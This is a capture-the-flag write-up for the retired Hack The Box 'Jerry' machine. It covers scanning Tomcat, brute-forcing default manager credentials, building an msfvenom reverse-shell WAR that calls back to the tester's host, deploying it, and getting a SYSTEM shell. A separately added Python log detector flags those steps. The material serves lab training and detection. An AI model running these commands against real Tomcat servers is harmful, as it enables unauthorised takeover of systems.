This is a writeup for the retired Hack The Box Jerry machine.
- Machine URL: https://www.hackthebox.com/machines/jerry
- Machine IP: 10.10.10.95
- Time required: 1 h
## Solution Summary
- Weak credentials (CWE-1392) in Apache Tomcat let users upload RCE payloads.
- Using the RCE payload, an attacker immediately has Windows SYSTEM (administrator) privileges, because Tomcat itself runs as that account.
## Solution
The following steps are needed to retrieve the flags:
- Find out frequently used default passwords for Tomcat instances.
- Craft a reverse shell payload using Metasploit's `msfvenom`.
- Upload the reverse shell payload using Tomcat's deploy mechanism and launch the reverse shell.
- Read out the flags from the Administrator's desktop.
## Nmap
Did you know that on Linux, ping is run as a setuid binary? Now that I know, it makes sense: ping needs to send out raw (non-TCP) packets, and handling raw sockets requires the CAP_NET_RAW capability on Linux.
For example, the specific code that configures ping as a setuid binary in NixOS can be found here.
```bash
# Nmap is a bit stubborn without sudo: without it, it appears to think the
# host is down, because the host blocks ping probes
sudo nmap -sV -sC -A -oX machines/jerry/nmap.xml \
  10.10.10.95
```
```text
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:38 JST
Nmap scan report for 10.10.10.95
Host is up (0.22s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2012|8|Phone|7 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 (88%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Embedded Standard 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   291.39 ms 10.10.16.1
2   291.38 ms 10.10.10.95

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.62 seconds
```
To be sure we don't miss any TCP ports, we run a second TCP-only scan over the full port range:
```bash
sudo nmap -p- -sT -oX machines/jerry/nmap_tcp.xml 10.10.10.95
```
We don't find any other open ports after running the exhaustive scan:
```text
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-09 10:44 JST
Nmap scan report for 10.10.10.95
Host is up (0.084s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds
```
Findings:
- Apache Tomcat/7.0.88 running on port 8080
## Apache Tomcat
Apache Tomcat version 7.0.88 was released in 2018, and a lot of vulnerabilities have been published for it since. Three of them look interesting because they are low-complexity and can lead to an RCE.
It turns out that, luckily, we can make use of a much easier weakness, as we will see below.
We try to identify interesting URLs:
```bash
feroxbuster --wordlist SecLists/Discovery/Web-Content/common.txt \
  --threads 10 --scan-limit 1 \
  --url http://10.10.10.95:8080 --silent | tee machines/jerry/feroxbuster.log
```
The following URL sticks out:
```text
http://10.10.10.95:8080/manager/html
```
## Cracking the admin panel password
Why don't we brute-force our way into the admin panel located at `/manager/html`? Here's what we see when we try to access it without any authentication:
```bash
curl http://10.10.10.95:8080/manager/html -I
```
We get a 401 status code, and the `WWW-Authenticate` header tells us that HTTP Basic authentication is required:
```text
HTTP/1.1 401 Unauthorized
Server: Apache-Coyote/1.1
Cache-Control: private
Expires: Thu, 01 Jan 1970 02:00:00 EET
WWW-Authenticate: Basic realm="Tomcat Manager Application"
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Mon, 09 Sep 2024 09:15:37 GMT
```
We try to fuzz the credentials using Patator, combining a default-username list with a list of default Tomcat passwords and ignoring every 401 response:
```bash
patator.py http_fuzz \
  url=http://10.10.10.95:8080/manager/html \
  method=GET \
  0=SecLists/Usernames/cirt-default-usernames.txt \
  1=SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt \
  user_pass=FILE0:FILE1 \
  -x ignore:code=401
```
`admin:admin` does the trick and we are logged in. `tomcat:s3cret` also seems to work.
## Uploading a reverse shell
From `/docs/manager-howto.html`:
> http://localhost:8080/manager/text/deploy?path=/foo
>
> Upload the web application archive (WAR) file that is specified as the request data in this HTTP PUT request, install it into the appBase directory of our corresponding virtual host, and start, deriving the name for the WAR file added to the appBase from the specified path. The application can later be undeployed (and the corresponding WAR file removed) by use of the /undeploy command.

We craft a shell using `msfvenom`:
```bash
msfvenom --payload java/jsp_shell_reverse_tcp \
  --platform windows --arch x86 \
  LHOST=10.10.16.6 \
  LPORT=4444 \
  -f war > machines/jerry/msfvenom_shell.war
```
Then, we use curl to upload the `msfvenom_shell.war` shell created above:
```bash
curl -u "tomcat:s3cret" "http://10.10.10.95:8080/manager/text/deploy?path=/shell" \
  --upload-file machines/jerry/msfvenom_shell.war
```
The upload works:
```text
OK - Deployed application at context path /shell
```
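As a defensive counterpart to the two steps above (the credential fuzzing against `/manager/html` and the WAR deployment through `/manager/text/deploy`), here is a small detector that runs over Tomcat access-log lines and flags exactly this sequence: a burst of 401s against the manager application from one address, a successful authentication from the same address afterwards, and a WAR deployed through the text interface. This is example code added to this writeup; it is not part of the original post and not part of Tomcat. It assumes the default `AccessLogValve` `common` pattern (with the authenticated user in the third field), and the log lines it checks are constructed for illustration, modelled on the requests made above rather than captured from the box.

```python
"""Flag manager brute-force, follow-up login and WAR deployment in Tomcat
access logs (AccessLogValve 'common' pattern). Example code for this writeup;
the sample lines below are constructed, not captured."""
import re
from collections import defaultdict, deque
from datetime import datetime

# common pattern: host ident user [time] "method path protocol" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return one parsed access-log record, or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect(lines, threshold=10, window_seconds=60):
    """Scan log lines in order and return a list of alert dicts.

    manager_bruteforce   : >= threshold 401s to /manager/* from one IP within
                           window_seconds (reported once per IP)
    login_after_bruteforce: first authenticated 200 to /manager/* from an IP
                           that was already reported for a burst
    manager_deploy       : successful PUT to /manager/text/deploy, i.e. a WAR
                           was installed through the text interface
    """
    alerts = []
    failures = defaultdict(deque)   # ip -> timestamps of 401s inside the window
    burst_ips, login_ips = set(), set()
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/manager/"):
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["status"] == 401:
            q = failures[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()            # forget failures older than the window
            if len(q) >= threshold and ip not in burst_ips:
                burst_ips.add(ip)
                alerts.append({"type": "manager_bruteforce", "ip": ip,
                               "failures": len(q), "first": q[0], "last": ts})
        elif rec["status"] == 200:
            if rec["method"] == "PUT" and rec["path"].startswith("/manager/text/deploy"):
                alerts.append({"type": "manager_deploy", "ip": ip, "user": rec["user"],
                               "path": rec["path"], "after_bruteforce": ip in burst_ips})
            elif ip in burst_ips and ip not in login_ips and rec["user"] != "-":
                login_ips.add(ip)
                alerts.append({"type": "login_after_bruteforce", "ip": ip,
                               "user": rec["user"], "ts": ts})
    return alerts


# Constructed sample: 12 failed Basic-auth attempts in 12 seconds, a successful
# login, then a WAR deployed via the text interface, plus unrelated traffic.
SAMPLE_LOG = [
    f'10.10.16.6 - - [09/Sep/2024:09:15:{37 + i} +0000] "GET /manager/html HTTP/1.1" 401 2473'
    for i in range(12)
] + [
    '10.10.14.2 - - [09/Sep/2024:09:15:50 +0000] "GET / HTTP/1.1" 200 11217',
    '10.10.16.6 - tomcat [09/Sep/2024:09:16:02 +0000] "GET /manager/html HTTP/1.1" 200 15874',
    '10.10.16.6 - tomcat [09/Sep/2024:09:16:40 +0000] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 49',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The threshold and window are deliberately conservative: a human mistyping a manager password does not produce ten 401s in a minute, whereas Patator's username/password product does so within seconds. The `manager_deploy` alert is worth keeping even without a preceding burst, since a WAR arriving through the text interface is rare on most servers and, on this box, is the step that turned a guessable password into a SYSTEM shell.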
We launch Socat locally to catch the connection, then trigger the deployed application from another terminal:
```bash
socat -d TCP4-LISTEN:4444 STDIO
# Somewhere else
curl http://10.10.10.95:8080/shell/
```
## Retrieve flags
The shell works and we are already a privileged user:
```text
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
nt authority\system
```
We find the flags on the Administrator's desktop:
```text
dir C:\Users\Administrator\Desktop\flags\
06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,397,736,960 bytes free
```
Print out the flags:
```text
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"
```
The flags are revealed:
```text
user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```